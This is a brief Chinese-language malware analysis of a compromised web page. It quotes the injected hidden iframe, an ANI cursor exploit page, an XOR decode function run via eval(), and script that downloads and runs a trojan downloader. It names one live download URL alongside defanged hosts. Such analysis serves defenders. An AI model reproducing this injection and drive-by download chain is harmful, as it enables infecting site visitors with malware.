加入的代码为:
/--- <iframe src='hxxp://s**72.91**152**0.net/site/g****g/1**.htm' height=0 width=50></iframe> ---/
hxxp://s**72.91**152**0.net/site/g****g/1**.htm 包含为:
/--- <DIV style="CURSOR: url('love.jpg')"></DIV></DIV></BODY></HTML> <iframe src=hxxp://s**72.91**152**0.net/site/g****g/1**4.htm name="main1" height="0" width="100" ></iframe> ---/
love.jpg(Kaspersky报为Exploit.Win32.IMG-ANI.k)下载 http://mail.8u8y.com/ad/pic/1.exe
文件说明符 : D:/test/1.exe
Kaspersky 报为 Trojan-Downloader.Win32.Delf.bga ,瑞星报为 Trojan.Mnless.kip
hxxp://s**72.91**152**0.net/site/g****g/1**4.htm的内容为JavaScript脚本代码,功能为用自定义函数:
/--- var Z=function(m){return String.fromCharCode(m^79)}; ---/
解密代码并通过 eval() 来运行。
解密后的 内容仍为JavaScript脚本代码,功能为
是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 hxxp://mail.8***u**8y.com/ad/pic***/temp.exe,保存到%windir%,文件名由自定义函数:
/--- function gn(n){var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe';} ---/
生成,即 ~tmp****.exe,其中****为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法运行。
temp.exe与前面的1.exe相同。
